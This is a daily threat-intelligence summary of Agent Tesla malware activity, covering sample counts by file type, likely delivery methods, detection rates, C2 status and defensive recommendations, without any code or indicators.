Daily Summary
Agent Tesla activity remained stable on 2026-05-04, with 64 new samples detected against a 7-day average of 61, representing a 4% increase. This marginal uptick does not indicate a surge but reflects sustained, consistent distribution. No abrupt spikes or drops were observed.
New Samples Detected
The new sample set shows a clear preference for script-based loaders, with .ps1 (19 samples) and .js (15 samples) accounting for over half of all detections. Executables (.exe) totaled 13, while .dll, .bat, and archive formats (.tar, .rar, .gz, .zip) appeared in smaller numbers. Notably, a single sample used the non-standard extension .93763227, which may indicate an attempt to bypass file-type filters or a manual rename during analysis. The dominance of PowerShell and JavaScript suggests attackers are favoring living-off-the-land techniques over direct executable delivery.
Distribution Methods
Agent Tesla is primarily delivered via script-based payloads today, likely embedded in phishing emails or hosted on compromised sites. The high count of .ps1 and .js files points to campaigns that rely on user interaction to execute these scripts, often through macros or attachment downloads. The absence of a dominant archive format such as .zip or .rar (only 4 combined) contrasts with typical malware delivery trends, indicating a deliberate shift away from compressed attachments. This technique evades email gateways that block archive files but allow scripts.
Detection Rate
Current AV engines show moderate detection for these variants, but the script-heavy payloads may evade static detection due to heavy obfuscation or use of legitimate system binaries for execution. The .93763227 sample likely bypasses signature-based checks entirely, as this extension is not commonly monitored. Dynamic analysis remains more reliable for catching these samples.
C2 Infrastructure
No new C2 servers were identified today, suggesting the current infrastructure remains stable and reused from prior campaigns. No geographic patterns emerged from newly reported IOCs, as the 64 new IOCs focus on file hashes rather than network indicators.
7-Day Trend
Activity over the past week has been remarkably steady, with daily counts fluctuating only slightly around the 61-sample average. Today’s 4% increase does not signal a ramp-up but rather routine distribution within an established campaign.
Security Analysis
An overlooked behavior in this sample batch is the use of .tar and .gz archives, which are less common for Agent Tesla but are increasing. These formats are often unmonitored by email filters designed for .zip or .rar files. Defenders should extend archive analysis policies to include .tar, .gz, and .bz2, and implement behavioral rules that flag execution of scripts from archive extraction paths.